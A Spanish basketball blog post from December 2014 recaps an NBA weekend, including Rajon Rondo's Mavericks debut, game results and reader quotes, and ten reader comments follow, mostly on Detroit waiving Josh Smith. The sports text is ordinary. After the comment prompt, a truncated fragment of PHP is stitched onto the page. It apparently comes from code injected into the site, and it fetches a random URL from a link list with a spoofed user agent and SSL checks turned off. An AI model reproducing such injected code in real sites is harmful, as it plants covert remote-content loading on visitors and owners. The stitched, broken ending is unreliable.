Informe del fin de semana: Rondo tejano

22 de December de 2014 por TheDeerHunter

Os hemos dejado un poco abandonados este fin de semana. Ya sabéis, las tipicas cenas-trampa de empresa que por ejemplo no nos permitieron disfrutar de un viernes baloncestístico espectacular. Sin embargo, buena parte de la atención del fin de semana estaba centrada en el debut de Rajon Rondo con los Dallas Mavericks. Un debut, en el que ex de los Celtics ya dio pistas de lo que puede ser su aportación de aquí a final de temporada.

A pesar de las cenas, alguno llegó a tiempo al duelo fratricida Bulls@Grizzlies…

“Partidazo de Mirotic en el FedEx. Al descanso 15 puntos con un 4/4 en triples, reboteando y bailando.” Nacho

Thibodeau les dió a los Osos de su propia medicina, y les dejó por debajo del 40% desactivando a sus potentes hombres altos. Sólo Mike Conley y Beno Udrih lograron leer los sistemas defensivos rivales. Por los Bulls el combo Jimmy ButlerNikola Mirotic llevó eficazmente el peso del ataque en el mejor partido del hispano-balcánico desde que está en la liga.

Poco después los Spurs repetían con un must-see de tres prórrogas como el que habían sufrido un par de días antes frente a Memphis y de nuevo sufrieron una derrota. El dúo Damian LillardLamarcus Aldridge acabó imponiéndose al Danny GreenTim Duncan. Los campeones notan la ausencia de Parker. La noche se cerraba con una inesperada derrota de los Clippers en Denver y un choque más disputado de la cuenta entre Thunder y Lakers, sin Kevin Durant y apenas sin Kobe, en un partido suyo horrendo de cara al aro.

Antes de todo esto los Jazz habían ganado en Orlando y los Hornets en Philadelphia; los Celtics iniciaban la era post-Rondo con victoria ante Wolves; Mike Miller aprovechaba su primera titularidad en los Cavs para lucirse con 7 triples; los Raptors endosaban su 12ª derrota seguida en el Palace a los Pistons (y se dice pronto), y los Wizards lograban mantener la buena línea de resultados en una apurada victoria ante Heat.

El sábado…

Vaya batacazo para los Pelicans. Que llegue Portland a tu casa y te endose un 114-88 cuando la noche anterior jugaron 3 prórrogas como visitantes. Encima anulando a Anthony Davis que hacía tiempo no firmaba un partido tan malo: 7 puntos con una serie de 3-14,6 rebotes y 5 tapones.
Vi un poco del partido Spurs @ Mavs para ver el debut de Rajon Rondo,y bueno,más que Rondo me queda el poso de que Popovich podría hacer finalista a los 76ers…presentó a Joseph-Bellinelli-Kyle Anderson-Diaw-Baynes como 5 inicial y se lo hicieron pasar putas a Dallas durante todo el partido.Sólo en el último cuarto,con 9 puntos seguidos de un Ellis percutor durante toda la noche,cedieron en el marcador.La hoja de Rondo en su línea,6 puntos,7 rebotes y 9 asistencias.” Ruxixon

Por la tarde habíamos visto la victoria de unos flojos Suns en casa de los aún más flojos Knicks; los Hornets lograban por primera vez este curso dos victorias seguidas a costa de los Jazz; los Hawks daban otro puñetazo en la mesa ganando en Houston con un gran Kyle Korver; Danilo Gallinari se salía ante Pacers para poco después romperse otra vez (estará entre 3 y 4 semanas fuera de las canchas) y Chris Paul lograba llevar a los suyos hasta la victoria a pesar de lo difícil que se lo puso el hombre orquesta Giannis Antetokoumpo y sus Bucks.

Para el domingo el encuentro más destacado sobre el papel era el Grizzlies – Cavaliers que se inició descafeinado por la baja de Zach Randolph. A pesar de ellos los visitantes se agarraron al partido hasta que en el último cuarto Dion Waiters acabó dando la victoria a los suyos. También vivimos un par de sorpresas: por un lado la victoria de los Pelicans ante los Thunder. Cierto es que los locales no contaban con Kevin Durant. 35 puntos de Anthony Davis y 15 asistencias de Jrue Holiday acabaron tumbando a Westbrook y compañía. También perdieron en casa los Wizards, ellos ante los Suns que han acumulado 3 victorias en sus 3 desplazamientos consecutivos fuera de casa. Sin duda, un buen balón de confianza.

en serio, Darren Collison debe ser de los peores bases titulares de la liga” José Luis

Así de contundente se mostraba Jose Luis a pesar de los 19 puntos de Collison y la victoria de los Kings ante los Lakers. Tal vez por ello, han empezado a aparecer rumores que sitúan a Deron Williams en la franquicia californiana a cambio de prácticamente nada. De todas maneras, la mayor parte de la culpa de la victoria de los Kings fue de Demarcus Cousins y su 29-14 y de Kobe Bryant y sus 8 de 30 en TC y sus 9 pérdidas.

Los Knicks volvieron a caer (esta vez ante los Raptors) y ya acumulan 25 derrotas den 30 partidos. No se pueden dormir porque ya tienen cerquita a los Sixers que vencieron a los Magic a domicilio y se hicieron con su 3ª victoria del año. Los Pistons y Wolves, los otros 2 peores equipos de la liga, también cayeron ante Nets y Pacers, respectivamente. Andre Drummond acumuló otro partido con 20 o más rebotes pero no fue suficiente para llevarse la victoria. Finalmente, los Heat se impusieron con comodidad a unos renovados Celtics en los que Marcus Smart fue titular y los jugadores recién llegados desde Dallas disputaron sus primeros minutos.

Comenta

10 comentarios a esta entrada

  1. rumbero dice:
    #1

    Poco he podido ver este fin de semana, pero lo de Lillard contra los Spurs es grandioso. Posiblemente el mejor clutch player de las últimas temporadas.

      Citar

  2. Simon dice:
    #2

    Buenas chicos!!! Cuanto tiempo sin escribir por aqui!! este año ando muy liado y no tengo ni un rato para escribir por aqui aunque no he dejado de leeros ni un solo dia. Ahora que es navidad y tengo unos dias libres me pasare por aqui a diario.

    Lo que ha provocado mi presencia aqui ha sido leer la noticia probablemente mas estupida que haya visto nunca en nba….
    LOS PISTONS CORTAN A JOSH SMITH

    Vale que sigue sin encajar. Que no es ni la sombra de lo que se esperaba…. pero en serio??? cortado??? Nadie se ha parado a pensar en Pistons que este tio podia ser traspasado?? Supongo que si pero de no encontrar nada… lo cortan en DIciembre??? sin esperar al trade deadline??? EN fin…. ninguna explicacion racional le encuentro y mas teniendo en cuenta que si no estoy equivocado, al ser cortado, el salario de Smith seguira contando en el tope del equipo… Un sin sentido vamos.

      Citar

  3. TheDeerHunter dice:
    #3

    Justo ahora estaba pensando que nadie habría comentado nada de lo de Josh Smith en el blog.

    Esperpéntico lo de los Pistons. Lo fichan claramente sin necesidad, le pagan una morterá, le hacen jugar de lo que no sabe, se devalúa, afecta la renovación de Monroe y ahora esto…

      Citar

  4. Denise dice:
    #4

    Pero bueno, qué coño hace Detroit?? No lo entiendo. Vale que ya no es aquel molón todoterreno santimbanqui de highlights de Atlanta pero tampoco es una puta bazofia ni su salario es tan descabellado. ¿Saben en Detroit que significa la palabra “trade”? Porque, joder, no me entra en la cabeza que no haya en la liga equipos que te ofrezcan cosas buenas a cambio de él.

      Citar

  5. rumbero dice:
    #5

    Esperpéntico. Cuando crees que Detroit ya no puede ir a peor… Dumars al menos hubiera sacado un Amundson de la vida, dos mierda de rondas y un cartón de tabaco

      Citar

  6. Ruxixón dice:
    #6

    Hombre.quiero creer que a Detroit no han llegado ofertas para tradear a Smith,si no esto es lo más extraño que he visto en muchísimo tiempo para un jugador de cierto pedigrí -aunque se ha ido perdiendo por el camino desde su última temporada en Atlanta-.Algo debe haber pasado en ese vestuario para que se tome una medida tan extrema,a Van Gundy no le faltan huevos y es que es una decisión que le marca desde ya esos 5 años que tiene firmados y que veremos a final de ciclo como se le valora (si es que llega a cumplir el lustro).A ver lo que pasa con Jennings a todo esto,pero abierta la veda…

    Sobre lo del CAP,creo que usan lo que se llama la “stretch provision”,le seguirán pagando el contrato firmado,42 millones en 3 años (con este) según Basketball Reference,pero los 2 últimos años pueden redistribuirlos en el doble de años más 1,es decir,para el CAP de esta temporada cuentan los 14 millones cortados pero los 28 restantes (a 14 por año en las 2 temporadas sucesivas) se separan en 5,así que para el CAP quedan casi 6 millones cada una de las próximas 5 temporadas.Creo que es algo así.Así que el próximo verano rondarán los 40 millones,menos si no ejercen la Team Option sobre Butler.

      Citar

  7. Nacho dice:
    #7

    Exhibición Harden en Houston. 31 puntos al descanso, robos varios y espectáculo. 73-53
    Tampoco van mal de puntos en Chicago. 60-66 al descanso para los Raptors.
    Y yo mareado de ver los dos partidos al tiempo, jeje. no se si aguantaré a las segundas partes.
    Se prevé igualado el choque del Este, los Blazers bajarán los brazos probablemente y ‘la barba’ puede hacer historia.
    buenas noches

      Citar

  8. Nacho dice:
    #8

    Pues espectáculo Rose en el último cuarto en Chicago!!!

      Citar

  9. rumbero dice:
    #9

    Nacho:
    Exhibición Harden en Houston. 31 puntos al descanso, robos varios y espectáculo. 73-53

    Pues porque en el tercer y último cuarto no ha jugado mucho, que sino se nos va a los 60 puntos con lo fino que andaba. 44 al final en poco más de media horita

      Citar

  10. josgel dice:
    #10

    No, si al final Danny Ferry se llevará el premio a manager del año.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>